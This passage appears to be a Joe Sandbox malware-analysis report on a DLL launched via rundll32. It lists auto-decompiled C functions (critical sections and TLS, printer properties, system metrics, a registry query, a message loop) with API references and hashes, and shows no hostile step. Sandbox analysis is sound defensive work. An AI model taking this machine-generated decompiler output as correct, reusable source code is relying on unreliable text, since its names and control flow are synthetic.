                                                                                                        								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
                                                                                                        							}
                                                                                                        							 *(_t65 + 0xc) = _t42;
                                                                                                        							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                        							 *(_t65 + 8) = _t62[3];
                                                                                                        							TlsSetValue( *_t62, _t65);
                                                                                                        							_t55 =  *(_t66 + 8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t36 =  *(_t65 + 0xc);
                                                                                                        					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                        						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                        					}
                                                                                                        					_push( *(_t66 - 0x14));
                                                                                                        				}
                                                                                                        				LeaveCriticalSection();
                                                                                                        				return E10017C60(_t36);
                                                                                                        			}














                                                                                                        0x10013c4d
                                                                                                        0x10013c54
                                                                                                        0x10013c59
                                                                                                        0x10013c5b
                                                                                                        0x10013c5e
                                                                                                        0x10013c62
                                                                                                        0x10013c65
                                                                                                        0x10013c6b
                                                                                                        0x10013c72
                                                                                                        0x10013d73
                                                                                                        0x10013c81
                                                                                                        0x10013c89
                                                                                                        0x10013c8d
                                                                                                        0x10013cc1
                                                                                                        0x10013cc4
                                                                                                        0x10013cc9
                                                                                                        0x10013ccb
                                                                                                        0x10013cd7
                                                                                                        0x10013cd7
                                                                                                        0x10013ccd
                                                                                                        0x10013ccd
                                                                                                        0x10013cd3
                                                                                                        0x10013cd3
                                                                                                        0x10013cd9
                                                                                                        0x10013cde
                                                                                                        0x10013ce1
                                                                                                        0x10013ce4
                                                                                                        0x10013ce7
                                                                                                        0x00000000
                                                                                                        0x10013c8f
                                                                                                        0x10013c8f
                                                                                                        0x10013c95
                                                                                                        0x10013ca4
                                                                                                        0x10013ca4
                                                                                                        0x10013ca7
                                                                                                        0x10013d0b
                                                                                                        0x10013d11
                                                                                                        0x10013d16
                                                                                                        0x10013ca9
                                                                                                        0x10013cae
                                                                                                        0x10013cb4
                                                                                                        0x10013cb7
                                                                                                        0x10013cb7
                                                                                                        0x10013d1c
                                                                                                        0x10013d1e
                                                                                                        0x10013d23
                                                                                                        0x10013d29
                                                                                                        0x10013d29
                                                                                                        0x10013d31
                                                                                                        0x10013d42
                                                                                                        0x10013d4e
                                                                                                        0x10013d53
                                                                                                        0x10013d59
                                                                                                        0x10013d59
                                                                                                        0x10013c95
                                                                                                        0x10013d5c
                                                                                                        0x10013d61
                                                                                                        0x10013d6b
                                                                                                        0x10013d6b
                                                                                                        0x10013d6e
                                                                                                        0x10013d6e
                                                                                                        0x10013d74
                                                                                                        0x10013d7f

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10013C54
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                        • _memset.LIBCMT ref: 10013D42
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1891723912-0
                                                                                                        • Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                        • Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
                                                                                                        • Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                        • Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E1000A6E3(void* __ecx, char* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				void* _t15;
                                                                                                        				void* _t20;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t35 = __ecx;
                                                                                                        				_t15 =  *(__ecx + 0x74);
                                                                                                        				if(_t15 != 0) {
                                                                                                        					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                        					if(_t15 == 0) {
                                                                                                        						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                        						if(_t15 != 0) {
                                                                                                        							_t18 =  *(_t35 + 0x70);
                                                                                                        							if( *(_t35 + 0x70) != 0) {
                                                                                                        								E10014056(_t18);
                                                                                                        							}
                                                                                                        							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                        							 *(_t35 + 0x70) = _t20;
                                                                                                        							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                        								E10014056( *(_t35 + 0x70));
                                                                                                        								 *(_t35 + 0x70) = 0;
                                                                                                        							}
                                                                                                        							_t15 = ClosePrinter(_v8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t15;
                                                                                                        			}







                                                                                                        0x1000a6e6
                                                                                                        0x1000a6e8
                                                                                                        0x1000a6ea
                                                                                                        0x1000a6f2
                                                                                                        0x1000a70c
                                                                                                        0x1000a714
                                                                                                        0x1000a71e
                                                                                                        0x1000a725
                                                                                                        0x1000a727
                                                                                                        0x1000a72c
                                                                                                        0x1000a72f
                                                                                                        0x1000a72f
                                                                                                        0x1000a746
                                                                                                        0x1000a74d
                                                                                                        0x1000a765
                                                                                                        0x1000a76a
                                                                                                        0x1000a76f
                                                                                                        0x1000a76f
                                                                                                        0x1000a775
                                                                                                        0x1000a775
                                                                                                        0x1000a725
                                                                                                        0x1000a77a
                                                                                                        0x1000a77e

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A700
                                                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1000A70C
                                                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A750
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
                                                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775
                                                                                                          • Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
                                                                                                          • Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
                                                                                                          • Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 168474834-0
                                                                                                        • Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                        • Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
                                                                                                        • Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                        • Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013854(void* __ecx) {
                                                                                                        				struct HDC__* _t18;
                                                                                                        				void* _t19;
                                                                                                        
                                                                                                        				_t19 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                        				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                        				 *0x1005aa30 = GetSystemMetrics(2) + 1;
                                                                                                        				 *0x1005aa34 = GetSystemMetrics(3) + 1;
                                                                                                        				_t18 = GetDC(0);
                                                                                                        				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                        				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                        				return ReleaseDC(0, _t18);
                                                                                                        			}





                                                                                                        0x1001385f
                                                                                                        0x10013865
                                                                                                        0x1001386c
                                                                                                        0x10013874
                                                                                                        0x1001387e
                                                                                                        0x1001388f
                                                                                                        0x10013899
                                                                                                        0x100138a1
                                                                                                        0x100138ad

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 10013861
                                                                                                        • GetSystemMetrics.USER32 ref: 10013868
                                                                                                        • GetSystemMetrics.USER32 ref: 1001386F
                                                                                                        • GetSystemMetrics.USER32 ref: 10013879
                                                                                                        • GetDC.USER32(00000000), ref: 10013883
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
                                                                                                        • ReleaseDC.USER32 ref: 100138A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$CapsDevice$Release
                                                                                                        • String ID:
                                                                                                        • API String ID: 1151147025-0
                                                                                                        • Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                        • Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
                                                                                                        • Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                        • Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                                                                        				char _v4;
                                                                                                        				intOrPtr _v12;
                                                                                                        				char* _v16;
                                                                                                        				void* _v20;
                                                                                                        				char* _v24;
                                                                                                        				char _v28;
                                                                                                        				long _v32;
                                                                                                        				char _v36;
                                                                                                        				char _v272;
                                                                                                        				char _v280;
                                                                                                        				intOrPtr _v292;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t40;
                                                                                                        				char _t44;
                                                                                                        				void* _t47;
                                                                                                        				void* _t54;
                                                                                                        				char* _t61;
                                                                                                        				void* _t77;
                                                                                                        				void* _t80;
                                                                                                        				void* _t81;
                                                                                                        				intOrPtr _t94;
                                                                                                        				void* _t98;
                                                                                                        				void* _t100;
                                                                                                        				void* _t101;
                                                                                                        				char* _t104;
                                                                                                        
                                                                                                        				_t95 = __edx;
                                                                                                        				_t81 = __ecx;
                                                                                                        				_t79 = __ebx;
                                                                                                        				_t104 =  &_v272;
                                                                                                        				_t40 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_a264 = _t40 ^ _t104;
                                                                                                        				_push(0x18);
                                                                                                        				E10017BC1(E10027F63, __ebx, __edi, __esi);
                                                                                                        				_t100 = __ecx;
                                                                                                        				_v20 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_t44 = E1000BB54(__ecx, __edx);
                                                                                                        				_v28 = _t44;
                                                                                                        				if(_t44 != 0) {
                                                                                                        					do {
                                                                                                        						__eax =  &_v28;
                                                                                                        						_push(__eax);
                                                                                                        						__ecx = __esi;
                                                                                                        						E1000BB65();
                                                                                                        						__eflags = __eax - __edi;
                                                                                                        						if(__eax != __edi) {
                                                                                                        							__edx =  *__eax;
                                                                                                        							__ecx = __eax;
                                                                                                        							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                                                                        						}
                                                                                                        						__eflags = _v28 - __edi;
                                                                                                        					} while (_v28 != __edi);
                                                                                                        				}
                                                                                                        				__eflags =  *(_t100 + 0x54);
                                                                                                        				if( *(_t100 + 0x54) == 0) {
                                                                                                        					L15:
                                                                                                        					 *[fs:0x0] = _v12;
                                                                                                        					_pop(_t98);
                                                                                                        					_pop(_t101);
                                                                                                        					_pop(_t80);
                                                                                                        					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                                                                        					__eflags =  &_a268;
                                                                                                        					return _t47;
                                                                                                        				} else {
                                                                                                        					__eflags =  *(_t100 + 0x68);
                                                                                                        					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_push("Software\\");
                                                                                                        						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
                                                                                                        						_v4 = 0;
                                                                                                        						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
                                                                                                        						_push(0x1002a248);
                                                                                                        						_push( &_v16);
                                                                                                        						_push( &_v36);
                                                                                                        						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                        						_push( *(_t100 + 0x68));
                                                                                                        						_v4 = 1;
                                                                                                        						_push(_t54);
                                                                                                        						_push( &_v24);
                                                                                                        						E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                        						_v4 = 3;
                                                                                                        						E10009CB7(_v36 + 0xfffffff0, _t95);
                                                                                                        						_push( &_v24);
                                                                                                        						_push(0x80000001);
                                                                                                        						E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                        						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                                                                        						__eflags = _t61;
                                                                                                        						if(_t61 == 0) {
                                                                                                        							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								_push( &_v16);
                                                                                                        								_push(0x80000001);
                                                                                                        								E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                        							}
                                                                                                        							RegCloseKey(_v20);
                                                                                                        						}
                                                                                                        						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                                                                        						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
                                                                                                        						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                                                                        						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
                                                                                                        						goto L15;
                                                                                                        					} else {
                                                                                                        						_push(_t104);
                                                                                                        						_push(_t81);
                                                                                                        						_v280 = 0x10057298;
                                                                                                        						E10017C83( &_v280, 0x1002e2fc);
                                                                                                        						asm("int3");
                                                                                                        						_push(4);
                                                                                                        						E10017BC1(E10027DEC, _t79, 0, _t100);
                                                                                                        						_t94 = E10013965(0x104);
                                                                                                        						_v292 = _t94;
                                                                                                        						_t77 = 0;
                                                                                                        						_v280 = 0;
                                                                                                        						if(_t94 != 0) {
                                                                                                        							_t77 = E1000CF71(_t94);
                                                                                                        						}
                                                                                                        						return E10017C60(_t77);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}




























                                                                                                        0x1000bd98
                                                                                                        0x1000bd98
                                                                                                        0x1000bd98
                                                                                                        0x1000bd9f
                                                                                                        0x1000bda3
                                                                                                        0x1000bdaa
                                                                                                        0x1000bdb0
                                                                                                        0x1000bdb7
                                                                                                        0x1000bdbe
                                                                                                        0x1000bdc0
                                                                                                        0x1000bdc3
                                                                                                        0x1000bdc6
                                                                                                        0x1000bdcd
                                                                                                        0x1000bdd0
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdd5
                                                                                                        0x1000bdd6
                                                                                                        0x1000bdd8
                                                                                                        0x1000bddd
                                                                                                        0x1000bddf
                                                                                                        0x1000bde1
                                                                                                        0x1000bde8
                                                                                                        0x1000bdea
                                                                                                        0x1000bdea
                                                                                                        0x1000bded
                                                                                                        0x1000bded
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdf2
                                                                                                        0x1000bdf5
                                                                                                        0x1000bed2
                                                                                                        0x1000bed8
                                                                                                        0x1000bee0
                                                                                                        0x1000bee1
                                                                                                        0x1000bee2
                                                                                                        0x1000beeb
                                                                                                        0x1000bef0
                                                                                                        0x1000bef7
                                                                                                        0x1000bdfb
                                                                                                        0x1000bdfd
                                                                                                        0x1000be03
                                                                                                        0x1000be05
                                                                                                        0x1000be0c
                                                                                                        0x1000be14
                                                                                                        0x1000be1f
                                                                                                        0x1000be22
                                                                                                        0x1000be27
                                                                                                        0x1000be2f
                                                                                                        0x1000be33
                                                                                                        0x1000be34
                                                                                                        0x1000be39
                                                                                                        0x1000be3c
                                                                                                        0x1000be40
                                                                                                        0x1000be44
                                                                                                        0x1000be45
                                                                                                        0x1000be53
                                                                                                        0x1000be57
                                                                                                        0x1000be5f
                                                                                                        0x1000be65
                                                                                                        0x1000be66
                                                                                                        0x1000be73
                                                                                                        0x1000be79
                                                                                                        0x1000be7b
                                                                                                        0x1000be90
                                                                                                        0x1000be95
                                                                                                        0x1000be9a
                                                                                                        0x1000be9b
                                                                                                        0x1000be9c
                                                                                                        0x1000be9c
                                                                                                        0x1000bea4
                                                                                                        0x1000bea4
                                                                                                        0x1000beb6
                                                                                                        0x1000bec2
                                                                                                        0x1000beca
                                                                                                        0x1000becd
                                                                                                        0x00000000
                                                                                                        0x1000be07
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x1000be05

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000BDB7
                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
                                                                                                        • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                        • String ID: Software\
                                                                                                        • API String ID: 3878845136-964853688
                                                                                                        • Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                        • Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
                                                                                                        • Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                        • Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
                                                                                                        				struct HWND__* _v4;
                                                                                                        				struct tagMSG* _v8;
                                                                                                        				int _v12;
                                                                                                        				int _v16;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t42;
                                                                                                        				struct tagMSG* _t43;
                                                                                                        				signed int _t45;
                                                                                                        				void* _t48;
                                                                                                        				void* _t50;
                                                                                                        				int _t53;
                                                                                                        				long _t56;
                                                                                                        				signed int _t62;
                                                                                                        				intOrPtr* _t64;
                                                                                                        				intOrPtr* _t67;
                                                                                                        				void* _t68;
                                                                                                        
                                                                                                        				_t63 = __ecx;
                                                                                                        				_t62 = 1;
                                                                                                        				_t67 = __ecx;
                                                                                                        				_v12 = 1;
                                                                                                        				_v16 = 0;
                                                                                                        				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
                                                                                                        					_t62 = 0;
                                                                                                        				}
                                                                                                        				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                        				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                        				_v4 = _t42;
                                                                                                        				_t43 = E1000B519(0);
                                                                                                        				_t68 = UpdateWindow;
                                                                                                        				_v8 = _t43;
                                                                                                        				while(1) {
                                                                                                        					L14:
                                                                                                        					_t73 = _v12;
                                                                                                        					if(_v12 == 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						while(1) {
                                                                                                        							L15:
                                                                                                        							_t45 = E1000B911(_t63, 0, _t67, _t73);
                                                                                                        							if(_t45 == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							if(_t62 != 0) {
                                                                                                        								_t53 = _v8->message;
                                                                                                        								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                        									E100128D7(_t67, 1);
                                                                                                        									UpdateWindow( *(_t67 + 0x20));
                                                                                                        									_t62 = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t64 = _t67;
                                                                                                        							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                        							_t79 = _t48;
                                                                                                        							if(_t48 == 0) {
                                                                                                        								_t39 = _t67 + 0x3c;
                                                                                                        								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                        								__eflags =  *_t39;
                                                                                                        								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                        							} else {
                                                                                                        								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                        								_pop(_t63);
                                                                                                        								if(_t50 != 0) {
                                                                                                        									_v12 = 1;
                                                                                                        									_v16 = 0;
                                                                                                        								}
                                                                                                        								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                        									continue;
                                                                                                        								} else {
                                                                                                        									goto L14;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_push(0);
                                                                                                        						E1000A5E4();
                                                                                                        						return _t45 | 0xffffffff;
                                                                                                        					}
                                                                                                        					__eflags = _t62;
                                                                                                        					if(_t62 != 0) {
                                                                                                        						_t63 = _t67;
                                                                                                        						E100128D7(_t67, 1);
                                                                                                        						UpdateWindow( *(_t67 + 0x20));
                                                                                                        						_t62 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000001;
                                                                                                        					if((_a4 & 0x00000001) == 0) {
                                                                                                        						__eflags = _v4;
                                                                                                        						if(_v4 != 0) {
                                                                                                        							__eflags = _v16;
                                                                                                        							if(_v16 == 0) {
                                                                                                        								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000002;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						L13:
                                                                                                        						_v12 = 0;
                                                                                                        						continue;
                                                                                                        					} else {
                                                                                                        						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                        						_v16 = _v16 + 1;
                                                                                                        						__eflags = _t56;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L13;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				goto L15;
                                                                                                        			}






















                                                                                                        0x1000f6f2
                                                                                                        0x1000f6fb
                                                                                                        0x1000f703
                                                                                                        0x1000f705
                                                                                                        0x1000f709
                                                                                                        0x1000f70d
                                                                                                        0x1000f71b
                                                                                                        0x1000f71b
                                                                                                        0x1000f720
                                                                                                        0x1000f726
                                                                                                        0x1000f72a
                                                                                                        0x1000f72e
                                                                                                        0x1000f733
                                                                                                        0x1000f739
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f74d
                                                                                                        0x1000f74f
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f7c2
                                                                                                        0x1000f7c8
                                                                                                        0x1000f7d0
                                                                                                        0x1000f7dd
                                                                                                        0x1000f7e5
                                                                                                        0x1000f7e7
                                                                                                        0x1000f7e7
                                                                                                        0x1000f7d0
                                                                                                        0x1000f7eb
                                                                                                        0x1000f7ed
                                                                                                        0x1000f7f3
                                                                                                        0x1000f7f5
                                                                                                        0x1000f830
                                                                                                        0x1000f830
                                                                                                        0x1000f830
                                                                                                        0x00000000
                                                                                                        0x1000f7f7
                                                                                                        0x1000f7fb
                                                                                                        0x1000f802
                                                                                                        0x1000f803
                                                                                                        0x1000f805
                                                                                                        0x1000f80d
                                                                                                        0x1000f80d
                                                                                                        0x1000f821
                                                                                                        0x00000000
                                                                                                        0x1000f823
                                                                                                        0x00000000
                                                                                                        0x1000f823
                                                                                                        0x1000f821
